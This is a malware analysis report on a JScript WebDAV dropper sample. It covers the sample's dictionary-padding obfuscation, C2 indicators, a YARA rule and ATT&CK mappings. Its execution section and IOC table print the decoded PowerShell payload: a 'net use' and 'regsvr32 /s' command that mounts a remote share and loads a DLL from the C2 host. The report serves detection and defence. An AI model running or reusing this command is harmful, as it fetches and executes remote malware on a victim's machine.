typeanalysisfamilyunclassified-js-webdav-dropperconfidencehighcreated2026-07-25updated2026-07-25scriptdropperc2obfuscationdefense-evasionexecutionmitre-attck
SHA-256: 2d0a98714f59984851d089045630ecebd2362cb7fe5f71d45395d0a8f7ee57ca
unclassified-js-webdav-dropper: 2d0a9871 — 62-entry noise-dictionary, 877-char variable name, WebDAV C2 94.159.113.79:8888
Executive Summary
JScript dropper belonging to the 107-sibling unclassified-js-webdav-dropper family. Uses a 62-entry dictionary lookup-table with random noise keys (507–999 characters each) and a 877-character variable name to inflate file size. At runtime it assembles a PowerShell -EncodedCommand payload via Function('return this')() that mounts a WebDAV share and silently registers a remote DLL. Seventh confirmed sibling on C2 IP 94.159.113.79:8888. Static-only — CAPE skipped because the file is a single-line JScript, not a supported binary class.
What It Is
- SHA-256:
2d0a98714f59984851d089045630ecebd2362cb7fe5f71d45395d0a8f7ee57ca ^[file.txt]
- Filename:
2277927785982214354.js ^[metadata.json]
- Size: 659,556 bytes (644 KB) ^[file.txt]
- Type: ASCII text, single line, no line terminators ^[file.txt]
- Family:
unclassified-js-webdav-dropper (107th confirmed sibling) ^[/intel/analyses/2d0a98714f59984851d089045630ecebd2362cb7fe5f71d45395d0a8f7ee57ca.html]
- CAPE: skipped — unsupported file type for detonation ^[dynamic-analysis.md]
How It Works
- Dictionary seeding: Declares a single array variable with a 877-character random noise name, then assigns 62 single-character values into it using random noise keys averaging 756 characters in length (range 507–999) ^[safe_exec2_output.txt].
- Payload assembly: Uses
Function('return this')() to obtain a reference to the global object, then chains bracket-indexed lookups (var['key']) with + concatenation to build the payload string ^[safe_exec2_output.txt].
- Execution: The assembled payload is passed to
WScript.Shell.Run() as a PowerShell -EncodedCommand string. The decoded command is:net use \\94.159.113.79@8888\davwwwroot\;regsvr32 /s \\94.159.113.79@8888\davwwwroot\8869272362403.dll
^[safe_exec2_output.txt]
- No decoy, no gate, no wrapper: No
wordpad decoy, no timeout anti-emulation gate, no sandbox checks, no batch/polyglot layer, no nested try/catch decoys — minimal footprint execution chain. ^[stats.js]
C2 Infrastructure
| Indicator |
Value |
| WebDAV C2 |
94.159.113.79:8888 ^[safe_exec2_output.txt] |
| Payload DLL |
8869272362403.dll ^[safe_exec2_output.txt] |
| Execution method |
regsvr32 /s via PowerShell -EncodedCommand ^[safe_exec2_output.txt] |
| WebDAV path |
\\94.159.113.79@8888\davwwwroot\ ^[safe_exec2_output.txt] |
Interesting Tidbits
- 877-character variable name — not the longest in the family (record held by
dfb1eb98 at ~3,787 chars), but well above the 8–20 character norm for non-extreme variants. ^[stats.js]
- Mean key length 756 characters — typical for extreme-padding variants in this family. Inflates the file to 644 KB without adding functional complexity. ^[stats.js]
- Seventh sibling on
94.159.113.79:8888 — joins fe261d49 (68th), be172014 (74th), dc76a67d (79th), 9665f822 (102nd), 26666aa2 (104th), and 27e35f3c (105th) on this endpoint. Sustained activity on .79 is now confirmed across seven samples. ^[entities/unclassified-js-webdav-dropper.md]
- No
try/catch decoys — unlike e6ebae6a and cc90d6c which wrap execution in nested try/catch blocks with decoy labels, this sample dispenses with them entirely. ^[safe_exec2_output.txt]
Deployable Signatures
YARA rule
rule WebDAV_JS_Dropper_Dictionary_62Entry_ExtremePadding
{
meta:
description = "JScript WebDAV dropper with 62-entry dictionary and extreme variable-name padding"
author = "PacketPursuit"
family = "unclassified-js-webdav-dropper"
reference = "2d0a98714f59984851d089045630ecebd2362cb7fe5f71d45395d0a8f7ee57ca"
strings:
$func_this = "Function(''"
$func_end = ")("
$dav = "davwwwroot" nocase
$regsvr = "regsvr32" nocase
$net_use = "net use" nocase
$encoded = "-EncodedCommand"
condition:
all of them and
filesize > 500KB and
filesize < 1MB and
#func_this >= 1
}
Behavioral fingerprint
A .js file delivered to a victim, opened via wscript.exe, declares a single array variable with a name longer than 500 characters, populates it with ~60 single-character assignments via random noise keys also longer than 500 characters, then calls Function('return this')() to assemble and execute a PowerShell -EncodedCommand payload that mounts a WebDAV share and runs regsvr32 /s against a remote DLL.
IOCs
| Type |
Value |
| SHA-256 |
2d0a98714f59984851d089045630ecebd2362cb7fe5f71d45395d0a8f7ee57ca |
| C2 IP |
94.159.113.79:8888 |
| Payload DLL |
8869272362403.dll |
| Execution |
regsvr32 /s \\94.159.113.79@8888\davwwwroot\8869272362403.dll |
Detection Signatures (ATT&CK)
| Tactic |
Technique |
Evidence |
| Execution |
T1059.005 (Visual Basic / JScript) |
.js file executed by wscript.exe ^[safe_exec2_output.txt] |
| Execution |
T1059.001 (PowerShell) |
PowerShell -EncodedCommand wrapper ^[safe_exec2_output.txt] |
| Execution |
T1218.010 (Regsvr32) |
regsvr32 /s \\host@8888\davwwwroot\*.dll ^[safe_exec2_output.txt] |
| Defense Evasion |
T1218 (System Binary Proxy Execution) |
wscript.exe → powershell.exe → regsvr32.exe chain ^[safe_exec2_output.txt] |
| Defense Evasion |
T1027 (Obfuscated Files or Information) |
Dictionary lookup-table obfuscation with extreme padding ^[safe_exec2_output.txt] |
| Command & Control |
T1071.001 (Web Protocols) |
WebDAV over HTTP via UNC path ^[safe_exec2_output.txt] |
| Command & Control |
T1105 (Ingress Tool Transfer) |
net use mounts WebDAV; regsvr32 fetches and loads remote DLL ^[safe_exec2_output.txt] |
References
Provenance
- Static analysis of
<sample 2d0a98714f59.bin> via Node.js vm.runInContext with proxy-based Function and eval interception ^[safe_exec2_output.txt].
- Dictionary entry count and key-length statistics computed via JavaScript regex against the raw file ^[stats.js].
- File type from
file utility ^[file.txt].
- ExifTool metadata from
exiftool ^[exiftool.json].
- CAPE status from
dynamic-analysis.md ^[dynamic-analysis.md].